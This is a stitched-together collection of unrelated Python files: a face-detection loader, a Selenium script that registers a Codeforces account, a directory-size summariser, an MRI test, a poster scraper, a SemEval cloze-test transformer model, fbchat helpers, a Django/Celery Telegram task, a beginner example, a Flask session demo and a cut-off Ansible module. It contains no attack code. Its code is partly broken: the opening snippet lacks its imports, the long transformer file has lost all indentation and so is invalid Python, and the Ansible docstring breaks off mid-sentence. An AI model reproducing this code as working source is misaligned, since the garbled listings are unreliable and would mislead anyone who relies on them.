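from typing import Any, Dict, List


@dataclass(frozen=True)
class MiniResponse:
    # default_factory is required: a mutable {} default would be shared
    json: Dict[str, Any] = field(default_factory=dict)

    @property
    def errors(self) -> List[str]:
        # missing "errors" key simply yields an empty list
        return [e.get("message", "") for e in self.json.get("errors", [])]

    @property
    def data(self) -> Dict[str, Any]:
        return self.json.get("data", {})


resp = MiniResponse(json={"data": {"x": 1}, "errors": [{"message": "boom"}]})
print(resp.data)    # -> {'x': 1}
print(resp.errors)  # -> ['boom']
```

`frozen=True` makes instances hashable and prevents mutation after the response is constructed, which suits an immutable server reply.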

# --- utils/loader.py (zhangcheng007/face_detection_base_on_mtcnn, MIT) ---

import numpy as np
import sys
import cv2

sys.path.append("../")
from utils.config import config


class TestLoader:
    def __init__(self, imdb, batch_size=1, shuffle=False):
        self.imdb = imdb
        self.batch_size = batch_size
        self.shuffle = shuffle
        self.size = len(imdb)  # num of data
        self.cur = 0
        self.data = None
        self.label = None
        self.reset()
        self.get_batch()

    def reset(self):
        self.cur = 0
        if self.shuffle:
            np.random.shuffle(self.imdb)

    def iter_next(self):
        return self.cur + self.batch_size <= self.size

    def __iter__(self):
        return self

    def __next__(self):
        return self.next()

    def next(self):
        if self.iter_next():
            self.get_batch()
            self.cur += self.batch_size
            return self.data
        else:
            raise StopIteration

    def getindex(self):
        return self.cur / self.batch_size

    def getpad(self):
        if self.cur + self.batch_size > self.size:
            return self.cur + self.batch_size - self.size
        else:
            return 0

    def get_batch(self):
        imdb = self.imdb[self.cur]
        im = cv2.imread(imdb)
        self.data = im
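The cursor arithmetic in `TestLoader` can be exercised without OpenCV or NumPy. This standalone sketch (the `MiniLoader` name is hypothetical) mirrors the `iter_next` and `getpad` logic: iteration stops once a full batch no longer fits, and `getpad` reports how many dummy entries the last partial batch would need:

```python
class MiniLoader:
    """Standalone sketch of TestLoader's cursor arithmetic (no cv2/numpy)."""

    def __init__(self, items, batch_size=2):
        self.items = items
        self.batch_size = batch_size
        self.size = len(items)
        self.cur = 0

    def iter_next(self):
        # True while a full batch still fits before the end of the data
        return self.cur + self.batch_size <= self.size

    def getpad(self):
        # number of dummy entries needed to fill the last partial batch
        if self.cur + self.batch_size > self.size:
            return self.cur + self.batch_size - self.size
        return 0


loader = MiniLoader(list(range(5)), batch_size=2)
loader.cur = 4
print(loader.iter_next())  # -> False (only one item left)
print(loader.getpad())     # -> 1
```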

# --- automated_codeforces_registration/auto_register.py (Asienwald/GCI-Fedora, MIT) ---

from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import datetime as dt
import sys
import getpass
import re


def start_registration(handle, email, pwd1, pwd2):
    print("Starting registration, browser opening shortly...\n")

    driver = webdriver.Chrome()
    URL_TO_CONNECT = "https://codeforces.com/register"
    driver.get(URL_TO_CONNECT)

    handle_input = driver.find_element_by_name("handle")
    email_input = driver.find_element_by_name("email")
    pwd1_input = driver.find_element_by_name("password")
    pwd2_input = driver.find_element_by_name("passwordConfirmation")

    handle_input.send_keys(handle)
    email_input.send_keys(email)
    pwd1_input.send_keys(pwd1)
    pwd2_input.send_keys(pwd2)

    form = driver.find_element_by_id("registerForm")
    form.submit()

    try:
        # wait for next page to load
        WebDriverWait(driver, 10).until(EC.url_changes(URL_TO_CONNECT))

        current_datetime = dt.datetime.now()
        driver.save_screenshot(f"{current_datetime}.png")
        driver.close()

        print(f"Screenshot captured! Saved as {current_datetime}.png")
        print("Exiting...")
        sys.exit(1)
    except Exception:
        print("Session Timeout. Handle might already be taken.")
        print("Exiting...")
        driver.close()
        sys.exit(1)


def main():
    print('''
_________ .___ ___________ __________ .__ __ __ .__
\_ ___ \ ____ __| _/____\_ _____/__________ ____ ____ \______ \ ____ ____ |__| _______/ |_____________ _/ |_|__| ____ ____
/ \ \/ / _ \ / __ |/ __ \| __)/ _ \_ __ \_/ ___\/ __ \ | _// __ \ / ___\| |/ ___/\ __\_ __ \__ \\ __\ |/ _ \ / \\
\ \___( <_> ) /_/ \ ___/| \( <_> ) | \/\ \__\ ___/ | | \ ___// /_/ > |\___ \ | | | | \// __ \| | | ( <_> ) | \\
\______ /\____/\____ |\___ >___ / \____/|__| \___ >___ > |____|_ /\___ >___ /|__/____ > |__| |__| (____ /__| |__|\____/|___| /
\/ \/ \/ \/ \/ \/ \/ \/_____/ \/ \/ \/
    ''')

    handle = input("Enter your username/handle to use: ")

    while True:
        email = input("Enter your email to use: ")
        if re.match('.+@{1}.+[.]{1}.+', email):
            break
        else:
            print("Please enter a valid email.\n")

    while True:
        pwd1 = getpass.getpass(prompt="Enter password: ")
        pwd2 = getpass.getpass(prompt="Enter password again: ")

        if pwd1 != pwd2:
            print("Passwords don't match.\n")
        elif not re.match("^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[!@#\$%\^&]).{5,}$", pwd1):
            # registration page checks for password strength
            print("Password must be >5 in length, have lowercase, uppercase, numbers and special characters.\n")
        else:
            break

    start_registration(handle, email, pwd1, pwd2)


if __name__ == '__main__':
    main()
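The email check in `main()` uses a deliberately loose pattern: it only requires some text, an "@", and a "." somewhere after it. A quick standalone run of the same regex against a few candidates:

```python
import re

# the same loose pattern used in main(): text, an "@", then text containing a "."
EMAIL_PATTERN = r'.+@{1}.+[.]{1}.+'

for candidate in ["user@example.com", "not-an-email", "a@b.c"]:
    ok = re.match(EMAIL_PATTERN, candidate) is not None
    print(candidate, "->", ok)
# user@example.com -> True
# not-an-email -> False
# a@b.c -> True
```

This is only a sanity filter, not RFC-compliant validation; strings like "a@@b.c" would also pass since `.+` matches "@" as well.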

# --- dir-stats-summary.py (rbrt-weiler/dir-stats, Zlib) ---

#!/usr/bin/python
# vim: set sw=4 sts=4 ts=8 et ft=python fenc=utf8 ff=unix tw=74 :
#
# SYNOPSIS
# ========
# This script analyses an INI file created by dir-stats.py and displays
# directories containing a certain amount of data.
#
# ARGUMENTS
# =========
# Call the script without any parameters to see a usage message.
#
# OUTPUT
# ======
# The script will print an INI style list of directory names and byte
# counts to stdout.
#
# HISTORY
# =======
# 2008-Jan-22 rbrt-weiler
#   * Created the script.
#

import getopt
import os.path
import sys
import time
import ConfigParser

##########################################################################

SCRIPT_VERSION = '1.0.0'

opt_limit = 50000000
opt_style = 'win'

##########################################################################

class MyRawConfigParser(ConfigParser.RawConfigParser):
    def optionxform(self, optionstr):
        return str(optionstr)

##########################################################################

def main():
    global opt_limit, opt_style

    try:
        opts, args = getopt.getopt(sys.argv[1:], 'hl:s:', ['help',
                                   'limit=', 'style='])
    except getopt.GetoptError:
        usage()
        sys.exit(1)

    for o, a in opts:
        if o in ('-h', '--help'):
            usage()
            sys.exit(1)
        if o in ('-l', '--limit'):
            opt_limit = int(a)
        if o in ('-s', '--style'):
            if a in ('win', 'unix'):
                opt_style = a
            else:
                usage()
                sys.exit(1)

    if 0 == len(args):
        usage()
        sys.exit(1)
    else:
        for arg in args:
            if not os.path.isfile(arg):
                print 'Error: "' + arg + '" is no file.'
                sys.exit(2)
        summarize(args)

##########################################################################

def summarize(filenames):
    if 'win' == opt_style:
        cmt_char = ';'
        kv_sep = ' = '
    else:
        cmt_char = '#'
        kv_sep = ': '

    summary = {}

    print cmt_char + ' created ' + time.asctime() + ' by ' \
        + 'dir-stats-summary v' + SCRIPT_VERSION
    print cmt_char + ' using a limit of ' + str(opt_limit) + ' bytes'

    for filename in filenames:
        cfg_parser = MyRawConfigParser()

        try:
            f_in = open(filename, 'r')
        except:
            print 'Error: Cannot read file "' + filename + '".'
            sys.exit(3)
        cfg_parser.readfp(f_in)
        f_in.close()

        sections = cfg_parser.sections()
        for section in sections:
            options = cfg_parser.options(section)
            for option in options:
                try:
                    size = cfg_parser.getint(section, option)
                except ValueError:
                    size = 0
                (basedir, basename) = os.path.split(option)
                if summary.has_key(basedir):
                    summary[basedir] = summary[basedir] + size
                else:
                    summary[basedir] = size

        total_dirs = 0
        total_size = 0
        filename = os.path.basename(filename)
        dirs = summary.keys()
        dirs.sort()

        print
        print '[' + filename + ']'
        for dir in dirs:
            if summary[dir] >= opt_limit:
                print dir + kv_sep + str(summary[dir])
                total_dirs = total_dirs + 1
                total_size = total_size + summary[dir]
        print cmt_char + ' ' + filename + ': ' + str(total_dirs) \
            + ' directories with ' + str(total_size) + ' bytes'

        cfg_parser = None
        summary = {}

##########################################################################

def usage():
    print 'dir-stats-summary v' + SCRIPT_VERSION + ' - released ' \
        + 'under the Zlib license'
    print 'Usage: ' + os.path.basename(sys.argv[0]) + ' [options] ' \
        + 'filename [...]'
    print
    print 'Options:'
    print '  -h, --help'
    print '      Display this usage message and exit.'
    print '  -l BYTES, --limit=BYTES'
    print '      Set the minimum number of bytes that triggers reporting '
    print '      of a directory.'
    print '      The default limit is 50000000 bytes.'
    print '  -s STYLE, --style=STYLE'
    print '      Define the style of the output. Accepted values are ' \
        + '"win" and "unix".'
    print '      The default value is "win".'

##########################################################################

if '__main__' == __name__:
    main()
    sys.exit(0)

# --- sammba/registration/tests/test_base.py (salma1601/sammba-mri, CECILL-B) ---

import os
from nose import with_setup
from nose.tools import assert_true
import nibabel
from nilearn.datasets.tests import test_utils as tst
from nilearn.image import index_img
from sammba.registration import base
from sammba import testing_data
from nilearn._utils.niimg_conversions import _check_same_fov


@with_setup(tst.setup_tmpdata, tst.teardown_tmpdata)
def test_warp():
    anat_file = os.path.join(os.path.dirname(testing_data.__file__),
                             'anat.nii.gz')
    func_file = os.path.join(os.path.dirname(testing_data.__file__),
                             'func.nii.gz')
    func_file0 = os.path.join(tst.tmpdir, 'mean_func.nii.gz')
    func_img0 = index_img(func_file, 0)
    func_img0.to_filename(func_file0)
    registered_anat_oblique_file, mat_file = \
        base._warp(anat_file, func_file0, write_dir=tst.tmpdir,
                   caching=False, verbose=False)
    assert_true(_check_same_fov(nibabel.load(registered_anat_oblique_file),
                                func_img0))
    assert_true(os.path.isfile(mat_file))

# --- crawling_image/get_image.py (Lee-JH-kor/Review_Project, MIT) ---

import urllib.request
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
from PIL import Image
import os


def image_poster(title_address):
    url = f'{title_address}'
    req = urllib.request.Request(url)
    res = urllib.request.urlopen(url).read()
    soup = BeautifulSoup(res, 'html.parser')
    soup = soup.find("div", class_="poster")

    # get the path of the img element
    imgUrl = soup.find("img")["src"]
    # urlretrieve is a download function
    # img.alt is the image's alternative text
    urllib.request.urlretrieve(imgUrl, soup.find("img")["alt"] + '.jpg')

    plt.show()

# --- Nowruz_SemEval.py (mohammadmahdinoori/Nowruz-at-SemEval-2022-Task-7, MIT) ---

# -*- coding: utf-8 -*-
"""Nowruz at SemEval 2022: Tackling Cloze Tests with Transformers and Ordinal Regression
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1RXkjBpzNJtc0WhhrKMjU-50rd5uSviX3
"""
import torch
import torch.nn as nn
from torch.functional import F
from datasets import Dataset
import transformers as ts
from transformers import AutoTokenizer , AutoModelForSequenceClassification
from transformers import TrainingArguments, Trainer
from transformers import DataCollatorWithPadding
from transformers import create_optimizer
from transformers.file_utils import ModelOutput
from transformers.modeling_outputs import SequenceClassifierOutput
from coral_pytorch.layers import CoralLayer
from coral_pytorch.losses import coral_loss
from coral_pytorch.dataset import levels_from_labelbatch
from coral_pytorch.dataset import proba_to_label
from dataclasses import dataclass
from typing import Optional, Tuple
import numpy as np
import pandas as pd
from scipy import stats
import sys
from data_loader import (
retrieve_instances_from_dataset,
retrieve_labels_from_dataset_for_classification,
retrieve_labels_from_dataset_for_ranking,
write_predictions_to_file,
)
"""#Preparing Data"""
def loadDataset(dataPath , labelPath=None , scoresPath=None):
dataset = pd.read_csv(dataPath, sep="\t", quoting=3)
ids , sentences , fillers = retrieve_instances_from_dataset(dataset)
#Creating dictionaries to convert datas to Huggingface Dataset
datasetDict = {
"id": ids,
"sentence": sentences,
"filler": fillers,
}
labels = None
if labelPath != None:
labels = pd.read_csv(labelPath, sep="\t", header=None, names=["Id", "Label"])
labels = retrieve_labels_from_dataset_for_classification(labels)
datasetDict["labels"] = labels
scores = None
if scoresPath != None:
scores = pd.read_csv(scoresPath, sep="\t", header=None, names=["Id", "Label"])
scores = retrieve_labels_from_dataset_for_ranking(scores)
datasetDict["scores"] = scores
#Removing Periods if fillers appear at the end of the sentence (because if we don't period will be considered last word piece of the filler)
for index , _ in enumerate(fillers):
fillers[index].replace("." , "")
#Creating Huggingface Datasets from Dictionaries
dataset = Dataset.from_dict(datasetDict)
return dataset
"""#Preprocessing"""
def preprocessDataset(dataset , tokenizer):
def addToDict(dict_1 , dict_2 , columns_1=[] , columns_2=["input_ids" , "attention_mask"]):
for item_1 , item_2 in zip(columns_1 , columns_2):
dict_1[item_1] = dict_2.pop(item_2)
def mappingFunction(dataset):
outputDict = {}
cleanedSentence = dataset["sentence"].replace("\n" , " ").replace("(...)" , "").strip()
sentenceWithFiller = cleanedSentence.replace("[MASK]" , dataset["filler"].strip()).strip()
tokenized_sentence = tokenizer(sentenceWithFiller)
addToDict(outputDict , tokenized_sentence , ["input_ids" , "attention_mask"])
#Getting the index of the last word piece of the filler
if "cls_token" in tokenizer.special_tokens_map.keys():
filler_indecies = len(tokenizer(tokenizer.special_tokens_map["cls_token"] + " " + cleanedSentence.split("[MASK]")[0].strip() + " " + dataset["filler"].strip() , add_special_tokens=False)["input_ids"]) - 1
elif "bos_token" in tokenizer.special_tokens_map.keys():
filler_indecies = len(tokenizer(tokenizer.special_tokens_map["bos_token"] + " " + cleanedSentence.split("[MASK]")[0].strip() + " " + dataset["filler"].strip() , add_special_tokens=False)["input_ids"]) - 1
else:
filler_indecies = len(tokenizer(cleanedSentence.split("[MASK]")[0].strip() + " " + dataset["filler"].strip() , add_special_tokens=False)["input_ids"]) - 1
outputDict["filler_indecies"] = filler_indecies
return outputDict
return dataset.map(mappingFunction , batched=False)
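The filler-index computation above tokenizes everything up to and including the filler, then takes `len(...) - 1` as the position of the filler's last word piece. The same idea can be sketched with a toy whitespace tokenizer (the `toy_tokenize` helper is an illustration, not part of the original code):

```python
# Toy sketch of the "last word piece index" trick, using whitespace tokenization
# instead of a real Hugging Face tokenizer:
def toy_tokenize(text):
    return text.split()

sentence = "the movie was [MASK] good"
filler = "really"
prefix = sentence.split("[MASK]")[0].strip()
# index of the filler's last piece = pieces up to and including the filler, minus one
filler_index = len(toy_tokenize(prefix + " " + filler)) - 1
```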
"""#Model Definition"""
@dataclass
class CustomOutput(ModelOutput):
loss: Optional[torch.FloatTensor] = None
logits: torch.FloatTensor = None
classificationOutput: torch.FloatTensor = None
regressionOutput: torch.FloatTensor = None
class SequenceClassificationModel(nn.Module):
def __init__(self,
encoder,
dim,
use_coral=False,
use_cls=True,
supportPooledRepresentation=False,
mode="both",
num_labels=3,
num_ranks=5,
lambda_c=0.5,
lambda_r=0.5,
dropout_rate=0.2):
super().__init__()
#mode can be one of these: ["both" , "classification" , "regression"]
self.encoder = encoder
self.dim = dim
self.use_coral = use_coral
self.use_cls = use_cls
self.supportPooledRepresentation = supportPooledRepresentation
self.mode = mode
self.num_labels = num_labels
self.num_ranks = num_ranks
self.lambda_c = lambda_c
self.lambda_r = lambda_r
self.dropout_rate = dropout_rate
if self.use_cls:
self.pre_classifier = nn.Linear(self.dim*2 , self.dim , bias=True)
else:
self.pre_classifier = nn.Linear(self.dim , self.dim , bias=True)
self.dropout = nn.Dropout(p=self.dropout_rate , inplace=False)
self.regressionHead = CoralLayer(self.dim , self.num_ranks)
if use_coral:
self.classificationHead = CoralLayer(self.dim , self.num_labels)
else:
self.classificationHead = nn.Linear(self.dim , self.num_labels , bias=True)
def forward(
self,
input_ids,
attention_mask,
filler_indecies,
labels=None,
scores=None,
**args):
device = self.encoder.device
# Getting fillers representation from pre-trained transformer (encoder)
sentence_embedding = self.encoder(
input_ids=input_ids,
attention_mask=attention_mask,
)
#Getting Fillers Representation
filler_tokens = sentence_embedding[0][filler_indecies[0] , filler_indecies[1]]
fillers = filler_tokens[: , 0 , :]
#Concatenating [CLS] output with Filler output if the model supports [CLS]
pooled_output = None
if self.use_cls:
if self.supportPooledRepresentation:
pooled_output = torch.concat((sentence_embedding[1] , fillers) , dim=-1)
else:
pooled_output = torch.concat((sentence_embedding[0][: , 0 , :] , fillers) , dim=-1)
else:
pooled_output = fillers
#Passing Pooled Output to another dense layer followed by activation function and dropout
pooled_output = self.pre_classifier(pooled_output)
pooled_output = nn.GELU()(pooled_output)
pooled_output = self.dropout(pooled_output)
#Passing the final output to the classificationHead and RegressionHead
classificationOutput = self.classificationHead(pooled_output)
regressionOutput = self.regressionHead(pooled_output)
totalLoss = None
classification_loss = None
regression_loss = None
#Computing classification loss
        if labels is not None and (self.mode.lower() == "both" or self.mode.lower() == "classification"):
if self.use_coral:
levels = levels_from_labelbatch(labels.view(-1) , self.num_labels).to(device)
classification_loss = coral_loss(classificationOutput.view(-1 , self.num_labels - 1) , levels.view(-1 , self.num_labels - 1))
else:
loss_fct = nn.CrossEntropyLoss()
classification_loss = loss_fct(classificationOutput.view(-1 , self.num_labels) , labels.view(-1))
#Computing regression loss
        if scores is not None and (self.mode.lower() == "both" or self.mode.lower() == "regression"):
levels = levels_from_labelbatch(scores.view(-1) , self.num_ranks).to(device)
regression_loss = coral_loss(regressionOutput.view(-1 , self.num_ranks - 1) , levels.view(-1 , self.num_ranks - 1))
        if self.mode.lower() == "both" and (labels is not None and scores is not None):
            totalLoss = (self.lambda_c * classification_loss) + (self.lambda_r * regression_loss)
        elif self.mode.lower() == "classification" and labels is not None:
            totalLoss = classification_loss
        elif self.mode.lower() == "regression" and scores is not None:
            totalLoss = regression_loss
outputs = torch.concat((classificationOutput , regressionOutput) , dim=-1)
finalClassificationOutput = torch.sigmoid(classificationOutput)
finalRegressionOutput = torch.sigmoid(regressionOutput)
finalClassificationOutput = proba_to_label(finalClassificationOutput.cpu().detach()).numpy()
finalRegressionOutput = torch.sum(finalRegressionOutput.cpu().detach() , dim=-1).numpy() + 1
return CustomOutput(
loss=totalLoss,
logits=outputs,
classificationOutput=finalClassificationOutput,
regressionOutput=finalRegressionOutput,
)
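In "both" mode the total loss is a weighted sum of the two head losses, controlled by `lambda_c` and `lambda_r`. A minimal numeric sketch (the loss values below are made-up placeholders):

```python
# Weighted multi-task loss, as combined in forward() when mode == "both"
lambda_c, lambda_r = 0.5, 0.5
classification_loss = 0.8
regression_loss = 0.4
total_loss = (lambda_c * classification_loss) + (lambda_r * regression_loss)
```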
def model_init(encoderPath=None,
dimKey=None,
customEncoder=None,
customDim=None,
mode="both",
use_coral=True,
use_cls=True,
supportPooledRepresentation=False,
freezeEmbedding=True,
num_labels=3,
num_ranks=5,
lambda_c=0.5,
lambda_r=0.5,
dropout_rate=0.2,):
    encoder = ts.AutoModel.from_pretrained(encoderPath) if encoderPath is not None else customEncoder
    dim = encoder.config.to_dict()[dimKey] if dimKey is not None else customDim
model = SequenceClassificationModel(
encoder,
dim,
use_coral=use_coral,
use_cls=use_cls,
supportPooledRepresentation=supportPooledRepresentation,
mode=mode,
num_labels=num_labels,
num_ranks=num_ranks,
lambda_c=lambda_c,
lambda_r=lambda_r,
dropout_rate=dropout_rate,
)
    try:
        if freezeEmbedding:
            for param in model.encoder.embeddings.parameters():
                param.requires_grad = False
    except AttributeError:
        print("The embedding layer has a different attribute name in this model; find the name of the embedding layer and freeze it manually")
return model
def makeTrainer(model,
trainDataset,
data_collator,
tokenizer,
outputsPath,
learning_rate=1.90323e-05,
scheduler="cosine",
save_steps=5000,
batch_size=8,
num_epochs=5,
weight_decay=0.00123974,
roundingType="F"):
def data_collator_fn(items , columns=[]):
data_collator_input = {
"input_ids": items[columns[0]],
"attention_mask": items[columns[1]]
}
result = data_collator(data_collator_input)
items[columns[0]] = result["input_ids"]
items[columns[1]] = result["attention_mask"]
def collate_function(items):
outputDict = {
key: [] for key in items[0].keys()
}
for item in items:
for key in item.keys():
outputDict[key].append(item[key])
data_collator_fn(outputDict , ["input_ids" , "attention_mask"])
#Removing unnecessary Items from outputDict
columns = ["sentence" , "filler" , "id"]
for item in columns:
try:
outputDict.pop(item)
except:
pass
#Adding New Columns
if "labels" in outputDict.keys():
outputDict["labels"] = torch.tensor(outputDict.pop("labels"))
if "scores" in outputDict.keys():
if roundingType == "F":
outputDict["scores"] = torch.tensor(outputDict.pop("scores") , dtype=torch.int32) - 1
elif roundingType == "R":
outputDict["scores"] = torch.tensor([round(score) for score in outputDict.pop("scores")] , dtype=torch.int32) - 1
filler_indecies = torch.tensor(outputDict.pop("filler_indecies")).view(-1 , 1)
outputDict["filler_indecies"] = (torch.arange(filler_indecies.shape[0]).view(-1 , 1) , filler_indecies)
return outputDict
training_args = TrainingArguments(
outputsPath,
learning_rate= learning_rate,
lr_scheduler_type=scheduler,
save_steps=save_steps,
per_device_train_batch_size=batch_size,
num_train_epochs=num_epochs,
weight_decay=weight_decay,
remove_unused_columns=False,
)
trainer = Trainer(
model=model,
args=training_args,
train_dataset=trainDataset,
tokenizer=tokenizer,
data_collator=collate_function,
)
return trainer , collate_function
"""#Evaluating on Val Dataset"""
def evaluateModel(
model,
dataset,
collate_function,
):
model.eval()
#Passing the inputs through model
labels = []
scores = []
for item in dataset:
sample_input = collate_function([item])
outputs = model(input_ids=sample_input["input_ids"].to(model.encoder.device),
attention_mask=sample_input["attention_mask"].to(model.encoder.device),
filler_indecies=sample_input["filler_indecies"],
scores=None)
labels.append(outputs["classificationOutput"][0])
scores.append(outputs["regressionOutput"][0])
#Computing Accuracy
count = 0
correctCount = 0
for prediction , target in zip(labels , dataset["labels"]):
count += 1
correctCount += 1 if prediction == target else 0
accuracy = (correctCount / count)
#Computing Spearman
scores = np.array(scores , dtype=np.float32)
valScores = np.array(dataset["scores"] , dtype=np.float32)
spearman = stats.spearmanr(scores.reshape(-1 , 1) , valScores.reshape(-1 , 1))
return (labels , scores) , accuracy , spearman
"""#Making Predictions on Test Dataset"""
def predictOnTestDataset(
model,
dataset,
collate_function,
labelsPath=None,
scoresPath=None,
):
model.eval()
ids = []
classification_predictions = []
ranking_predictions = []
for item in dataset:
sample_input = collate_function([item])
outputs = model(input_ids=sample_input["input_ids"].to(model.encoder.device),
attention_mask=sample_input["attention_mask"].to(model.encoder.device),
filler_indecies=sample_input["filler_indecies"],
scores=None,
labels=None)
ids.append(item["id"])
classification_predictions.append(outputs["classificationOutput"][0])
ranking_predictions.append(outputs["regressionOutput"][0])
    if labelsPath is not None:
        open(labelsPath , mode="wb").close()  # truncate any existing predictions file
        write_predictions_to_file(labelsPath , ids , classification_predictions , "classification")
    if scoresPath is not None:
        open(scoresPath , mode="wb").close()  # truncate any existing predictions file
        write_predictions_to_file(scoresPath , ids , ranking_predictions , "ranking")
return ids , classification_predictions , ranking_predictions
"""#Inference"""
def inference(
model,
sentences,
fillers,
tokenizer,
collate_function
):
model.eval()
datasetDict = {
"sentence": sentences,
"filler": fillers,
}
dataset = Dataset.from_dict(datasetDict)
tokenizedDataset = preprocessDataset(dataset , tokenizer)
finalInput = collate_function(tokenizedDataset)
outputs = model(
input_ids=finalInput["input_ids"].to(model.encoder.device),
attention_mask=finalInput["attention_mask"].to(model.encoder.device),
filler_indecies=finalInput["filler_indecies"],
)
finalLabels = []
for item in outputs["classificationOutput"].reshape(-1):
if item == 0:
finalLabels.append("Implausible")
elif item == 1:
finalLabels.append("Neutral")
elif item == 2:
finalLabels.append("Plausible")
finalLabels = np.array(finalLabels)
return {
"labels": finalLabels,
"scores": outputs["regressionOutput"],
}
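The model's outputs are decoded with coral_pytorch's `proba_to_label`, which thresholds each cumulative probability at 0.5 and counts how many clear it. The idea, re-implemented in plain Python as a sketch (this is an illustration, not coral_pytorch's tensor implementation):

```python
import math

# CORAL-style ordinal decoding: each logit models P(rank > k); the predicted
# label is the number of thresholds the example exceeds.
def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

def coral_logits_to_label(logits, threshold=0.5):
    return sum(1 for z in logits if sigmoid(z) > threshold)
```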
# fbchat/utils.py (Dainius14/fb-chat-bot-old, MIT license)
import re
import json
from time import time
from random import random
USER_AGENTS = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/601.1.10 (KHTML, like Gecko) Version/8.0.5 Safari/601.1.10",
"Mozilla/5.0 (Windows NT 6.3; WOW64; ; NCT50_AAP285C84A1328) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6"
]
def now():
return int(time()*1000)
def get_json(text):
return json.loads(re.sub(r"^[^{]*", '', text, 1))
def digit_to_char(digit):
if digit < 10:
return str(digit)
return chr(ord('a') + digit - 10)
def str_base(number,base):
if number < 0:
return '-' + str_base(-number, base)
(d, m) = divmod(number, base)
if d > 0:
return str_base(d, base) + digit_to_char(m)
return digit_to_char(m)
def generateMessageID(client_id=None):
k = now()
l = int(random() * 4294967295)
    return ("<%s:%s-%s@mail.projektitan.com>" % (k, l, client_id))
def getSignatureID():
return hex(int(random() * 2147483648))
def generateOfflineThreadingID():
    ret = now()
    value = int(random() * 4294967295)
    string = ("0000000000000000000000" + bin(value))[-22:]
    msgs = bin(ret) + string
    return str(int(msgs, 2))
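`digit_to_char` and `str_base` are pure functions, so they are easy to exercise in isolation. Copied here so the sketch is self-contained:

```python
# Recursive base conversion: divmod peels off the least-significant digit,
# and digits >= 10 map to letters starting at 'a'.
def digit_to_char(digit):
    if digit < 10:
        return str(digit)
    return chr(ord('a') + digit - 10)

def str_base(number, base):
    if number < 0:
        return '-' + str_base(-number, base)
    (d, m) = divmod(number, base)
    if d > 0:
        return str_base(d, base) + digit_to_char(m)
    return digit_to_char(m)
```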
# tetrad_cms/cases/tasks.py (UsernameForGerman/tetraD-NK, Apache-2.0 license)
from django.conf import settings
from requests import Session
import os
from json import dumps
from core.celery import app
@app.task(queue='cms')
def send_new_contact_to_admins(contact: dict, admins: list) -> None:
s = Session()
data = {'admins': admins, 'contact': contact}
url = settings.TELEGRAM_BOT_API_URL + 'send/contact'
try:
s.post(url, data=dumps(data), headers={'Content-Type': 'application/json'})
    except Exception as e:  # Exception (not BaseException), so KeyboardInterrupt/SystemExit still propagate
        print(e)
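The task posts a JSON body with `admins` and `contact` keys to the bot endpoint. The payload shape can be sketched without Django or requests (the field values below are hypothetical):

```python
from json import dumps, loads

# Shape of the payload posted by send_new_contact_to_admins
contact = {"name": "Jane", "phone": "+37060000000"}
admins = [111, 222]
body = dumps({"admins": admins, "contact": contact})
```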
# learning/example03_for.py (bokunimowakaru/iot, MIT license)
#!/usr/bin/env python3
# coding: utf-8
# Example 03: repetition with the for statement, what computers do best
from sys import argv                                # get this program's arguments, argv
for name in argv:                                   # assign each argument to the variable name
    print('Hello,', name + '!')                     # print the contents of name after the string "Hello"
# changing "argv" in the for statement to "argv[1:]" iterates over every argument from argv[1] onward
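The `argv[1:]` variant skips the program name at index 0. A stand-in list instead of `sys.argv` makes it testable:

```python
# argv[0] is the script name, so argv[1:] greets only the real arguments
argv = ["example03_for.py", "Alice", "Bob"]
greetings = ['Hello, ' + name + '!' for name in argv[1:]]
```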
# 2020/02/07/An Introduction to Sessions in Flask/flask_session_example/app.py (kenjitagawa/youtube_video_code, Unlicense)
from flask import Flask, render_template, session, redirect, url_for
app = Flask(__name__)
app.config['SECRET_KEY'] = 'prettyprinted'
@app.route('/')
def index():
return render_template('index.html')
@app.route('/set-background/<mode>')
def set_background(mode):
session['mode'] = mode
return redirect(url_for('index'))
@app.route('/drop-session')
def drop_session():
session.pop('mode', None)
    return redirect(url_for('index'))
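Because `SECRET_KEY` is set, values stored in `session` survive across requests via a signed cookie. A self-contained sketch of that round-trip using Flask's test client (the route names here are assumptions, not the ones in app.py above):

```python
from flask import Flask, session

demo = Flask(__name__)
demo.config['SECRET_KEY'] = 'demo-key'  # any non-empty secret enables signed session cookies

@demo.route('/set/<mode>')
def set_mode(mode):
    session['mode'] = mode
    return 'ok'

@demo.route('/get')
def get_mode():
    return session.get('mode', 'none')

client = demo.test_client()
client.get('/set/dark')  # the signed session cookie is kept by the test client
```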
# ansible_collections/cisco/nxos/plugins/modules/nxos_l3_interfaces.py (cjsteel/python3-venv-ansible-2.10.5)
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for nxos_l3_interfaces
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: nxos_l3_interfaces
short_description: L3 interfaces resource module
description: This module manages Layer-3 interfaces attributes of NX-OS Interfaces.
version_added: 1.0.0
author: Trishna Guha (@trishnaguha)
notes:
- Tested against NXOS 7.3.(0)D1(1) on VIRL
options:
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the NX-OS device
by executing the command B(show running-config | section '^interface').
- The state I(parsed) reads the configuration from C(running_config) option and
